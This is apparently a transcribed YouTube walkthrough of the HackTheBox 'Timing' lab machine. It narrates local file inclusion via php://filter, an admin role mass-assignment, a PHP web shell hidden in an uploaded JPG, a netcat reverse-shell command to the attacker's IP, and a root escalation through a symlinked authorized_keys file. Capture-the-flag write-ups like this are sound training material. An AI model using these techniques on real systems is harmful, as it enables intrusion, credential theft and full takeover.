Well, hello everyone, this is Mohammad Badruddin and today I'm going to solve another machine from Hackthebox. The machine name is timing and the difficulty level of this machine is medium. So without wasting time, let's go and see what we have. So I'm going to start it with nmap. I already ran the scan to save the time, but I will show you the syntax. So nmap space hyphen sv for version enumeration, space hyphen sc for default scripts, and the target IP is 10.10.11.135, and I want to save the scan results in default.nmap. So I'm going to show you the scan results. So there are two ports open. One is port number 22, another one is port number 80. So the port number 22 also open. The service running is SSH and the version is OpenSSH 7.6 p1, and on port number 80 the server running is Apache HTTPD 2.4.29. Once I did that machine, I also ran UDP scans and I also tried to find out the vulnerability on Apache HTTPD. So whenever you go for the reconnaissance phase, collect as much information as possible. I also create a record in etc host file. So if I show you timing.htb, so timing.htb inside etc/host file. So as you can see, this is the IP and this is the domain name. So now we can access the port 80 with this host name as I did it here. So as I know from this web application URL that this application is built on PHP, so it's showing me the page login.php. So what I did is I will go for the directory enumeration, go buster. Once I did that machine, I also enumerate the subdomains. So whenever you do, you enumerate as much as possible. That's what I want. So go buster directory enumeration. I don't want to see the progress, space hyphen w for the word list, and the word list I'm going to use is user share word list. Inside word list there is a sec list discovery, and discover the web contents. Inside that there is a raft, small directories, and dot text. Then I want to say to use the extension which is PHP because it is built on PHP. Then I am going to specify the URL which is http://timing.htb and / number of threads I want to use space hyphen t 64 and hit enter. So as we hit enter, we see that there are a few results. First is images directory, then css and uploads.php, logout.php, login.php, image.php. Both are different. This is images and this is image.php, profile.php, header, and many things. So I'm going to take out this result with me, copy, come here and just paste it out. Fine. So if we see this result closely, we will see that upload.php also you can see logout.php and profile.php, index.php, header.php. all these files redirects us to the login.php. That means to access these pages we have to log in, otherwise it will redirect us to the login page. But the interesting thing is /images, it is not redirecting us to anywhere. Also image.php does not redirect us to anywhere. So first of all, I will try to access image.php. Let's see what's inside it. So image.php, hit enter, and it's showing nothing. If I go to the page source, there is also nothing interesting. Okay, but if I go to images, so that's saying it's forbidden, means it is a genuine path but it's forbidden. So maybe there are other directories inside it or other parameters, something like this. But image.php is also interesting, because we see here no error, means there is no forbidden or not found anything. I try something like question mark file is equal to /etc/passwd, hit enter, and there is still nothing. So maybe we have different kind of parameter here, fine, to access the file. So for that we will go for the fuzzing, and we will use the tool which is fuff. So fuff space -w for the word list, and the word list I am going to use is for the parameter I am going to use is user share word list, sec list, inside sec list discovery, inside discovery web contents, and inside web content burp space -parameter names dot text, and the URL is going to be space -u http:// timing.htb/image.php, and this parameter I want to fuzz equals to /etc/passwd, and number of threads I want to use 64. Hit enter. As we hit enter, we found a lot of results, and all results are same, but all are status code 200 and the size is 0. So I want to filter this result with the size 0. So clear and run it again, but this time I am going to filter the size with 0 and hit enter. Now we will see a unique result. So as you can see, we find a valid parameter which is img. So go back here, and instead of file, let's say img, hit enter, and hacking attempts detected. Passwd, I want to use host file, and still hacking attempt is detected. So maybe we need to use filter. So because in PHP there is wrapping and filtering, so PHP : filter / convert, and convert dot base 64 -decode / resource is equal to etc host, hit enter, and this is gonna be the etc host file. Let's try to read passwd file. So passwd, hit enter. Still let's try encode here, hit enter, and yeah, we got this value. So we need to copy this value, come here, clear, and let's say echo, and inside that paste this value, then pipe this result to base 64 space -d to decode that. And as you can see, we got the etc passwd file. That means we have local file inclusion. We successfully found local file inclusion, and the important part is we have 2 users, those can run bin bash. So copy this and paste that here, and also I want to access this now with curl command. So that is super handy. I will do copy from here, paste that here, then pass this result to base 64 space -d, hit enter, and yeah, that's perfect. So now if we see closely here, we found a lot of files like upload.php, right, login.php. So first of all, let's see upload.php, what's inside upload.php. Come here and clear this, and instead of etc passwd file, I'm going to read upload.php, hit enter, and very well. So as you can see, there is admin authcheck.php. Then there is a upload directory. So all the files will be uploaded in this directory, whatever you upload. And then it is generating file hash is equal to unique ID, generating a unique ID and saving this unique ID value in this variable file hash. And then it is generating timestamp. So file hash with timestamp and generating its MD5 value, then underscore and the base name, which is the file name. Fine. So this is very important for me, because once we upload the file, it is not uploading with the same name. It is going to change the name in this format and then save it into this path, right? So I'm going to copy this, come here, upload.php and just paste that here. Fine. So clear. Now if we see this result, we find here one more file, which is admin authcheck. So copy and come here. What's that? Okay, and paste that here, hit enter. Why? Oh, it should be inside the resource. RESOURCE resource. Resource is equal to, come on, what I'm doing is equal to, yeah. So this includes authcheck.php and it's saying no permission to access the panel if your role is not equal to 1. So to access the panel, you must have role is 1, role is equal to 1, right? So this is also important, and I am going to keep this with me. Come here and paste, and also delete this. So this is the result for admin authcheck. Fine. The next file is index.php. Let's try index.php. Clear. Index.php, hit enter. Nothing much. Let's say image.php. Image.php. So there are blacklist for zip, FTP file, HTTP data, except HTTPS. So these are the blacklist. IMG, and here as you can see the parameter is here, what we fuzzed before. There is login.php. So let's try now login.php. Login.php, hit enter, and this is also interesting. Why? Because from this file we know that there is also a database connection file, and the name of that file is db_con file. So maybe by accessing this file we will know the password for the username Aaron, right? Because maybe that user reused the password, and inside database configuration file we have the database name, username, password, and the host name. Fine. And here as you can see It has two variable, username and password, and it is going to execute this query. So user ID, user role, index.php, fine. So now we need to access this db file, dbconf file. So copy, come here, all these informations are important and we find that information in login.php. Fine. So clear, again come here, and instead of login php we now want to access db underscore con.php, and as you can see here we found the username and password, actually password. So username is root, database name is app, and the host name is localhost, but the password is this. So we are going to try this password on username Aaron. So user name is equal to Aaron and password is equal to, so, and from where we got this user, from here, once we access the etc password file, passwd file, right? So let's go and go back here, go back. Let's try. So Aaron, and this is gonna be the password, hit enter. No, AARON Aaron, PASSWORD, nothing. Aaron, and the password is Aaron, hit enter, and yeah, we logged in, but we logged in as user 2. Maybe this is the role ID, but we need to here it said like, yeah, no permission to access the panel. Which panel we don't know, but to access the panel we must have role ID 1, and here it's 2. So let's go to the edit profile, and we want to capture this value, capture this request on the burp suite. Just make it update, come here, there is a post request, and send it to the repeater, come to the repeater, and as you can see, first name, last name, email and company. But if we see the, so in that file it's also saying you must have the role. Also inside login.php it also said that there is one more field which is role ID or role. Where is it? Let me show you. Role, first is ID and second parameter is role. So let's try to put here, add here the role. So role is equal to 1, and let's now send this request, and it's successful. Come here and just refresh this. So as we refresh this, and we can see the panel is here and it is the admin panel. Let's try to access this, and now we can use, or we can access the upload functionality. Now there is another thing, which is if you want to access the file, where is it? This one. So whenever you upload the file will be uploaded in this path, in this directory, but the file name gets changed with this, right? So what is the idea here? That we will create a file, and once we create that file, fine, we will upload that file, and we will simultaneously create a code which actually generate the timestamp. Fine. So let's see, and I will do it in the PHP. So first thing first, we create two files, touch1234.jpg and touch1234.php. hit enter. Now let's try to upload this PHP file, and we will see it's uploaded or there is a filter. There is a filter, so we cannot upload PHP file. Now let's try to upload JPG file, hit enter, and yeah, that file is uploaded. So now we will create we will open this file nano1234.jpg, and we will add here PHP code. So it is going to be PHP, and we will try to execute the system command. So PHP system, and inside it $_get, and inside that let's say the parameter name is cmd, and semicolon this. Fine. So just save it, cat1234.jpg, hit enter, and yeah, so clear this. And now it's time to form the PHP query, so PHP code, so that we can generate the file name. But the thing is, the problem here is it's actually generating the file name which is depending on the time. So we need to see the time on the target machine, and we need to see the time on our machine, because if both timings are different, then it is not possible. So nmap space -p, and the port number is 80, space -- script, and the script I am going to execute is http date on the target machine, this. So with that I will come to know the time on the target machine. So this is the time on the target machine. Date, let's say our timing, which is UTC. Good. So let's now, I already set it on the UTC, but I am showing you, if you want to set the time zone, you can do it with time date CTL. Okay, and just set space -time zone, and you just need to specify the time zone, which is UTC. Hit enter, and it's set. So date again, and yeah. I need to keep this with me. Copy, come here, and just paste that. Let's form the query. So I'm going to make it in the PHP. So because it's super easy to do it with the PHP, because we already have it here. We will take it up to here and copy this, come here, paste it here. Fine, this is the most important. So while now the condition is true, let's say echo date, and date should be I show you here. Let's say PHP date function, hit enter. So there is PHP date manual, date function manual. Go to that and open the date time interface format and come down, and here you will see everything. So if you see closely, the date is specified as this. First there is a day and day name, not the day in value in integer or numeric format. Then the month, which is also in the string format. Then it's gonna be the day, and time in hours, minutes and seconds, and then the time zone and the year. So how we will specify? Capital D is a textual representation of a day, like Monday or Sunday or anything. So we will use capital D, then we will use capital M, then small j, and then capital G. This is gonna be the time. So this is hours and minutes and then seconds, and then capital T and then capital Y. And all these are going to be in double quotes, and here semicolon. Fine. So DM for month, which is capital M here. So this is also the textual representation, like Jan, Feb, like this. Then if I show you what is J, so small j means day of the month without leading zeros. So it's in the integer value 1 to 31. Then G, you can see here, it is the time in 24 hours format. Then small s for seconds and small I for minutes, capital T for the time zone, and capital Y, there is Y. So Y means a full numeric representation of year, at least in the 4-digit. Fine. So that's done. We actually generate the time. Then what we need to do is echo, and let's say in the double quotes equal to, and again semicolon, then also echo, and this time I want to put this put this value. Fine. So copy this, come here, paste that here. Okay, so it must be in the single quotes because we need the exact string. Fine. And then the time. Okay, and then just close it with semicolon. Then let's say echo, and we need to go into the new line. Fine. And it will sleep for 1 second. 1. And we will execute this with PHP. So come here, clear this, PHP space -a, and paste that here. Come here again, here. So while uploading this file, we will execute this query. So and execute this one, and here upload the file. Yeah, uploaded. So once it's uploaded, come here and cancel this. So I'm going to take all these values, copy, come back here and paste this here. So now I will test all these values one by one, but make sure, because if you see this, it is going to also add the base name, which is your file name, with underscore value. So actually the file name which it save in the images/upload directory is gonna be like 1234.jpg, like this. Fine. So let's try. Copy, come here, or come here, clear, let's say curl, instead of all this. So image equal to images/uploads slash, and then copy this, paste that here, then underscore 1234 is the base file name, .jpg. Fine. And inside that jpg we actually create a parameter which is cmd, and let's say who am I, and enclose this double quotes, hit enter, nothing. Let's try another one, which is this. So copy, come here, paste, hit enter, nothing. Let's try one more time, and this time we will put this value. So copy, paste, hit enter, nothing interesting. Copy, come here, paste that, copy this value, paste that here. Oh, I did a blunder because the directory name is uploads, images slash uploads. Let's confirm this one more time real quick. Yeah, images slash uploads, so it should be uploads. First of all, A0, this one here, I need to put uploads, hit enter, nothing. Then 56 and images slash uploads, nothing. Then 181 here also I need to put it uploads, nothing. After 181 it's D0, uploads, nothing. After D0 there is 9E, it's already uploads. Now the next file is this, so I'm going to copy this, come here, paste, and yeah, that works. So this time the command is executed. So real quick, let's try to execute id command, and yeah, that works. So we are www data. Let's see if netcat is there or not. So nc, oh, we need to use, because this is URL encoded value, or this is URL, so we need to put the URL encoded value, and instead of a space I put %20, hit enter, and yeah, we can see netcat is on the system. So now we will try to get reverse shell. Clear, and just copy this, copy, and nc space hyphen nlvp port number 9090, hit enter. So we are listening here, and we will execute that command here. Instead of nc I will try nc, instead of space again I'm going to use this. My IP is ifconfig turn 0, hit enter. So we are listening here, and we will paste that value here, fine. And instead of which nc I'm gonna use nc, let's say plus, which nc, plus is working or not, which plus nc, yeah, plus is working. So that is super easy now. nc plus 10.10.14.68, which is my IP, plus 9090, which is the port, plus hyphen e, and plus /bin/bash. Hit enter, doesn't work. So let's see a few more things. Instead of this, let's try ls space hyphen la, hit enter, plus space hyphen la. So there are many files. We already read dbconf file, so let's try to read something else. Okay, close this, that's not working. So ls space hyphen la space slash opt, hit enter, and there is a source file. So we need to copy this file somewhere from where I can get this value. Let's see where I am right now. So pwd, hit enter. I am in where www html. Let's say copy this file. So copy plus slash opt slash this file, paste here into the, because we access the web directory, so we will copy this file into the web directory, then we will download this file. Slash where slash www slash html, okay, slash images and slash uploads, right? So we copy this file here, hit enter, of course, because we need to specify here space, hit enter. It seems copy. So now let's try to download this file. So wget and http colon slash slash 10.10.15.135, then slash image.php img is equal to images slash uploads and slash the file name, which is source file. Paste that, hit enter. Let's see here we get this file or not. Clear ls space hyphen la. Up to now not. Still we don't get that. Okay, let's try one more time, but this time image.php images, let's try timing.htb image.php image, and the value of the file is this. Hit enter, and yeah, this time it's working. Approximately done. ls space hyphen la. This is the zip file. Let's see, file and image. So zip data mv image to this file, paste, hit enter, clear ls space hyphen la. This is the zip file. So now let's unzip this. Unzip source, this, it's extracted, clear ls space hyphen la, and as you can see we have a backup file here, backup directory. So cd backup ls space hyphen la, and wonderful, we have all these files and directories, source file. So but the interesting part is there is git directory, so we can probably get changes, because we see that in the db underscore conf file there are credentials for the user, but maybe it's changed later. So any commit with the change we can get from the git. So git log, and as you can see there are two commits. So first of all I am going to see git diff the first commit, paste here, hit enter. There is nothing in the first commit. Let's try to access the second one. Copy git diff, paste, hit enter, and yeah, you can see there is a change. Red line and means it is deleted, and this one is added. So we need to take out we need to copy this value. So copy, come here, paste that here, and we will try now this for the user Aaron. Okay, so SSH AARON at timing.htb. Password is gonna be the super secret password. Copy, come here and paste, hit enter, and we are logged in. So clear ls space -la. We have user flag here, user.text, and this is the first flag. Fine, very fine. Now we will move for the privilege escalation. So sudo space -l, and as you can see, this user Aaron can run this netutils with the no password. Let's space -la, and let's paste this. So we can actually read and execute as root, and this file exists in the user bin. Let's try to read that file. So cat user bin netutils, and this is the file content. So copy this and paste it here. So as you can see here, this is a bash file first of all, but inside it's running Java command, and from the netutils.jar. So, and we cannot also read this file because this is inside the root directory. Let's see, /root/ netutils utils, yeah, permission denied, utils .jar, hit enter. Of course, permission deny. So we don't know exactly what it does, but we can execute it with the sudo. So sudo user bin and netutils, hit enter. So it's saying netutils version 1. This is some kind of network utility tool, and select one of any option. So it's saying 0 for FTP, 1 for HTTP, and 2 to quit. What if I say 3? Hit enter. So there is nothing to do with 3. We must choose one of these options. Okay, let's say 1 for the HTTP, hit enter. Now it's saying enter the URL. So let's try http:// and 10.10.14.64/ and here clear. I'm going to start python 3 space -m http.server on port number 80, hit enter, come here and hit enter. So it's hitting us, and it's saying opening output file default, ls space -la, and yeah, it's creating a file here. Let's say what's inside it, default, hit enter, and wonderful. If you see this query closely, we just give the path for the web server, but we did not specify any file here, even though it's download a file named as default and put this file in the same directory from where we execute the netutils. And once we access this file, so we can see that this file contains the listing of this directory. So ls space -la. So all these files are here, you can see. default.nmap and zip and all these. Let's try to give specific file and we will see what it's right. So clear sudo netutils and option is 1, which is http, and now the URL 10.10.14.68, which is my IP, and I am going to give it a file which is ph1234.php. hit enter. We got a hit here, and let's now quit this with the 2 option. Hit enter, ls space -la, and 1234.php is here. And the most interesting thing is this file has root privileges, means it is written as root. Let's try to see what's inside 1234.php. There is nothing. If we see here cat 1234.php, also there is nothing. So let's try to write something in 123456. So let's say echo well done apostrophe and send it to 1234.php. hit enter, cat 1234.php. so whatever is that, we just need something inside it. So clear, and let's start the Python 3 HTTP server on port number 80. Clear this, and let's execute netutils again. 1 for HTTP, put the URL of the attacker machine, which is my machine, /1234.php. hit enter, and yeah, we got the hit. So 2 for quit, ls space -la, and we got 1234.php.0 because 1234.php is already there. So rm space -rf 1234.php. let's try to delete ls space -la 1234.php. so I am going to read that file, and whatever we write here we get here. Here we can do one thing, nc space -nlvp on port number 80, right? We are listening here on port number 80, and okay, port number 80 is already used. Control C. For the banner grabbing, I'm trying to grab the banner. So start the process again, and number 1, and let's try to just 10.10.14.68 and hit enter. And because my machine is listening on port number 80, so let's see what we will get. And as you can see, we got hit here on this host, accept everything, range byte 1 minus, and user agent is lx 2.16.1, and this is something new for me. Fine. So let's try on search exploit if there is something on this. So clear search exploit, Excel, hit enter, Excel. No, this is nothing. So, and here exit, clear. So now what I am going to do here, first of all close this and come here. The thing is, what I am going to do, I will create a symlink and I will create one file on my attacker machine, or you can say Kali machine, and inside that file I will put my IDRSA public key, and on the target machine I will create a file with the same name but make a symbolic link or symlink with the root SSH authorized key file. So let's say root SSH IDRSA.public key, and let's say named as my key, hit enter, cat my key, hit enter, and as you can see this is my ID RSA public key. Now come here and I will create the symbolic link here, touch my hyphen key, fine, and hit enter. Now create the link here, so ln space hyphen s, and let's say slash root slash dot ssh slash authorized underscore keys, fine. So I'm hoping this this file is inside .ssh. Even if it's not, it will be created. So authorized underscore keys with my key, hit enter. My key file exists here. I created my key, yeah. So let's rm space hyphen rf my key, and let's run that command one again, and yeah, this time it's created. So now what we need to do is very easy. Now we need to execute that netutils again. So user bin and netutils, hit enter, and now yeah, we will choose the first option for HTTP. And before this I must start the HTTP server here, come on, that is gonna be the python 3 space hyphen m http dot server on port number 80, hit enter, it's started. Now come here, enter the URL, which is 10.10.14.68 slash my hyphen key key. That's it. And once we hit enter, our key is going to be, our public key is going to be copy in authorized key, fine. So now just make it fast, clear, come back here, and first we will try on it. So clear ssh space hyphen I, then slash root id rsa dot ssh slash id underscore rsa, and then root at timing dot htb, hit enter, and we should logged in, and yeah, we logged in. Exit this one, and as you can see, root and the host name is timing, ls space hyphen la, and we are inside the root directory, and cat root dot text, and we completed the who am I and host name. So that's it for this video. I hope you understand. If you have any query, please put your query in the comment section, and please like, subscribe and share, because it takes too much time to create this video and then manage to upload this on the YouTube. So see you in the next video. Bye.